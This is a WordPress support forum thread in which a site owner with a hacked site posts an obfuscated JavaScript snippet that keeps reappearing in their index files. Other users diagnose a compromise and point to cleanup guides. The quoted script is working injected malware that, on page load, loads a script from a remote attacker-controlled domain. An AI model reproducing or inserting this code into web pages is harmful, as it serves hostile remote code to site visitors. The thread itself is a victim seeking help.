Title: obfuscated code – can anyone decode?
Last modified: August 19, 2016

---

# obfuscated code – can anyone decode?

 *  Resolved [malibu06](https://wordpress.org/support/users/malibu06/)
 * (@malibu06)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/)
 * This code is showing up on all my index.php files once I upload to the server.
   I’ve tried replacing all the index.php with clean files only to find this code
   on the files a few hours later again.
 * `<script>/*GNU GPL*/ try{window.onload = function(){var Dwqlxqw7kr7vkv = document.
   createElement('s@$$^c&r!i^p&t^)#&'.replace(/\^|\$|\!|\(|&|\)|#|@/ig, ''));var
   N790b8w6sa8nl = 'U70yiuxmlrwd';Dwqlxqw7kr7vkv.setAttribute('type', 't&@^e!$&x
   ^&!t!#/@(j!(a@v@)a(s!!!@c^^!r)&&i&p)^#t))'.replace(/\$|@|\(|#|\)|\^|\!|&/ig, ''));
   Dwqlxqw7kr7vkv.setAttribute('src', 'h$t$&$(t^@p!@^:!^$!/(!/)!a&!d))#^d@@i)^(c
   $!$&!t#$i)#(n()$!g(g(!a#m$!#e^!$s)^-#c(&o@$(!m!.^#&f(!c&@!$2&.#c^o^&m!.!z(#i(#
   d#!)d$!$u!#!-#!(c!o&@m!$#.($t!@h)$e&$g)@i^@!f(t!#@s#a(l$)&)e!.&^@r((u$#@:^$8@@
   ^0&^!^8^^&0!@/@))g$)^@o$o&#$g(&l!(&)e$$.)#c@@o#m&/!!g(#o@$!o&g(!l$^#e@!.&($c!#
   o#m^#/^(d&$@i(^o^#n$(&.)#!n!)&e(!.)j!@p!#^$/@))v$!e))!r)(#i)!z^$@(o^((n)(.$n(
   @)e#@t$!/))^#w!^)i^&#r$($e#!@@$d)!!.#)&c#(@o(m&/&^'.replace(/\$|@|#|\(|&|\!|\)
   |\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('defer', 'd#e&)f@e)$r#)'.replace(/&|\(
   |#|@|\)|\$|\!|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('id', 'L^)#6^!)^q@@c#!@@e@&
   @e^#^f$$@n#^@#7&f@l@^^('.replace(/\!|&|\$|\)|\^|@|#|\(/ig, ''));document.body.
   appendChild(Dwqlxqw7kr7vkv);}} catch(O27phyeucb2au4) {}</script>`

Viewing 8 replies - 1 through 8 (of 8 total)

 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1330968)
 * Site url?
 *  Thread Starter [malibu06](https://wordpress.org/support/users/malibu06/)
 * (@malibu06)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1330996)
 * the site is [http://www.artcretedesigns.com](http://www.artcretedesigns.com)
 * i’ve disabled the index.php file and it is pointing to the old html file.
 * it seems to be some kind of virus. it is showing up on all index files whether
   php html asp…
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331047)
 * I think you may have been hacked.
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
 *  [Sandro M.](https://wordpress.org/support/users/msacom/)
 * (@msacom)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331182)
 * Hello to everybody. Is all the morning that I’m trying to decode or delete in
   some way my “double” base64 coding….I tried every thing, nothing…. and, unvelible,(
   in my template is working ok) I just deleted the command “get header” and “get
   footer” from index, page, search, etc. an I replaced them with a command “include”.
   I designed my footer (you can easily change the original one too removing completely
   the base 64 code using Dreamweaver or similar) and every thing works great.
    
   I cannot believe it. I lost 5 hours and the solution was there!
 *  [Sandro M.](https://wordpress.org/support/users/msacom/)
 * (@msacom)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331184)
 * I forgot. You have to save your footer.php (or header or whatelse) with another
   name, eg. footer2.php and live in the ROOT the original one running (alone and
   forgotten)
 *  [s_ha_dum](https://wordpress.org/support/users/apljdi/)
 * (@apljdi)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331185)
 * Sometimes this stuff can be encoded twenty times or more.
 * Removing the `get_header` and `get_footer` may get the code off your site but
   it doesn’t make you not-hacked. Someone got in. The door is still there and maybe
   there are additional back doors now. Whoever did this can come back. There may
   be other code that you haven’t found yet as well. You aren’t done.
 *  [Sandro M.](https://wordpress.org/support/users/msacom/)
 * (@msacom)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331186)
 * Sorry, I post a reply to the wrong argument!!! My trick was just to delete advertise
   in WP Themes.
 *  [s_ha_dum](https://wordpress.org/support/users/apljdi/)
 * (@apljdi)
 * [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331188)
 * I don’t understand your comment about deleting ‘advertise’ but my point still
   stands for anyone reading the thread: this is not a solution to a hacked site.
   It might be a quick band-aid but it is not the end of the story.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘obfuscated code – can anyone decode?’ is closed to new replies.

## Tags

 * [obfuscated code](https://wordpress.org/support/topic-tag/obfuscated-code/)

 * In: [Installing WordPress](https://wordpress.org/support/forum/installation/)
 * 8 replies
 * 4 participants
 * Last reply from: [s_ha_dum](https://wordpress.org/support/users/apljdi/)
 * Last activity: [16 years, 4 months ago](https://wordpress.org/support/topic/obfuscated-code-can-anyone-decode/#post-1331188)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics